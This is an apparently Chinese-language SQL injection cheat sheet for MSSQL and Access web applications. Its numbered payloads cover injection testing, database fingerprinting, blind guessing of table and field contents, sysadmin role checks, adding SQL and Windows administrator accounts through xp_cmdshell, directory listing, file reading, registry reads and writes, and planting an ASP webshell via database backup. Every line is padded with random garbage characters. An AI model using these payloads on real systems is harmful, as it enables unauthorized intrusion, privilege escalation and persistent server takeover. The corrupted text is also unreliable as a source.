1.判断是否有注入;and 1=1 ;and 1=2 ?8�H8O %Z8
2.初步判断是否是mssql ;and user>0 �wy<S;�� �
%OL$��57Ia
3.注入参数是字符'and [查询条件] and ''=' R^8o^z['6u
TM_�_I\+Q
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,1.p%UE�]>
<�6%?OJhp�
5.判断数据库系统 e-})�6)XgA
GLH�0 ��]�
;and (select count(*) from sysobjects)>0 mssql �U�#7#aeI�
p}}R��-D&K
;and (select count(*) from msysobjects)>0 access x x��HY+(m
��S1T�"Z{$
<�VMGT�BVQ
�_b
pP50Cu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��XAD�- 'i
wy�H[x!QX�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 W]$w@�.oW[
�H�`X��UJh
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 CC�s%%U/=
NR$3%0 nC6
9.(1)猜字段的ascii值(access) W 8<&�gh+
kP�=eW�_0D
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �Y Vt�% �0
OR�� P\b��
(2)猜字段的ascii值(mssql) @o].He@L<j
CImWd.W9~�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `P@<����3]
Y,qI@n<���
10.测试权限结构(mssql) h�k;5w{t}}
h��]�5(�].
+qN>.y�!�Y
r5S[-`s��;
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- '0;l]/�i.�
^ox=�H�NV
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �@Z�_x�.Y6
0Uz�"^xO["
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- >.Pn�kx��*
L�8@f-�Kk�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- c`)\�Pb�/O
�KWbI�'}_z
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �;HfmzY�(
~�p�6� V,Q
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- EgEa1l!NSQ
�dM��.f]-g
;and 1=(select IS_MEMBER('db_owner'));-- I�V~>I-r�d
+z�q�n<�<9
���7uq�zm�
B&���M%I:i
11.添加mssql和系统的帐户 "m):Y;9iQ?
Zu�zEg�*lb
;exec master.dbo.sp_addlogin username;-- Y��sC>i`n9
;exec master.dbo.sp_password null,username,password;-- ,C�\i^>=��
G��q)]s'r2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �Da�Q?\uq�
u=����*FI
;exec master.dbo.xp_cmdshell 'net user username password c1(R�uP:S
.�|K��yNBn
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- BiL�Y�(1�,
kM l+yli3c
;exec master.dbo.xp_cmdshell 'net user username password /add';-- (Bb5�?��fw
Em�Wn�%eMN
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- AG
nxY�V"p
f�3�l&3h�C
fivw~z|�[@
zy?|O��D�M
12.(1)遍历目录 5:[0z�5Hww
0�(}�t�8lc
;create table dirs(paths varchar(100), id int) f].h^��~.q
PA{PD.4D�u
;insert dirs exec master.dbo.xp_dirtree 'c:\' �d�w>C@c#"
_�gR;=��~S
;and (select top 1 paths from dirs)>0 D(op�)�]8�
x
M/+�L:_<
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]�J�g&VXrH
�,$�L4d�F3
Wx%�H%FeK
*\a4w�Z6<3
(2)遍历目录
�Ux!�p�8�
�& bm
1�Fz
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?/E~/;+�7=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 w>&�a�Ev/f
m,_�Z6=�I:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Xh"n��]�TK
9
�RgV�K{F
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 WF+99�?7�5
QD&`�^(X1p
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 wo�{gG�?�B
Z9Z�Pr?C=�
��vk�V0�On
F`W?I��I?�
13.mssql中的存储过程 �n�s���C3
Zd%k*��B�C
xp_regenumvalues 注册表根键, 子键 d�h iuI|?@
CI�0�C1/:@
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Y;M|D�'y+�
[#vH�'�y��
xp_regread 根键,子键,键值名 �(_]~wi�-,
h
�0�Q5-EA
;exec xp_regread 3BJ0S�.TF�
��T�n �e�4
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 W��q�&if�_
O�Rw,)l���
xp_regwrite 根键,子键, 值名, 值类型, 值 .f2bNnB~pP
%�J�Bz�5�G
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 R4cM%l_�#W
Qx#"q�'�2
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 g3/�W=~��r
�5r|,C�Q7o
xp_regdeletevalue 根键,子键,值名 ��U(g:zae
D?_Zl;bQ'^
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 s�f�8�7$S0
Qbn"�=�n2�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 lv�z7#f L~
`�iNSr?N�.
.@U@xR�u7|
5c0� �ZRV#
14.mssql的backup创建webshell \ ���:sUL!
@o _}g !9=
use model *vxk@�`K~�
�HyZqUb�Ha
create table cmd(str image); �ZhaP2pC%4
�v>)"HL"XG
insert into cmd(str) values (''); �PiIpnoM��
2�r?G6D�|�
backup database model to disk='c:\l.asp'; K7:�)n�v
E
�-;���m0R
)9`qG:b'�
l<LI�7Z]A
15.mssql内置函数 AJ`h�9�%B
d.d��/�<�
;and (select @@version)>0 获得Windows的版本号 �Id .n�u/
pJ"�qu,��w
;and user_name()='dbo' 判断当前系统的连接用户是不是sa M`!H�"R��7
ChPm�X+.i_
;and (select user_name())>0 爆当前系统的连接用户 ��v����MH�
C��kuh:bs
;and (select db_name())>0 得到当前连接的数据库 �#r�fiD�%c
UECK�:61Me
�f+,qNvBY/
[!#L6&:a�8
16.简洁的webshell w-MCZwC�r)
�q�"8e�a/
use model Fj3a���.'
�/]Md~=yNp
create table cmd(str image); 7*A],:-q
>W+��%��8e
insert into cmd(str) values (''); !ons]^km�
�Ma�Qqs=�
backup database model to disk='g:\wwwtest\l.asp';
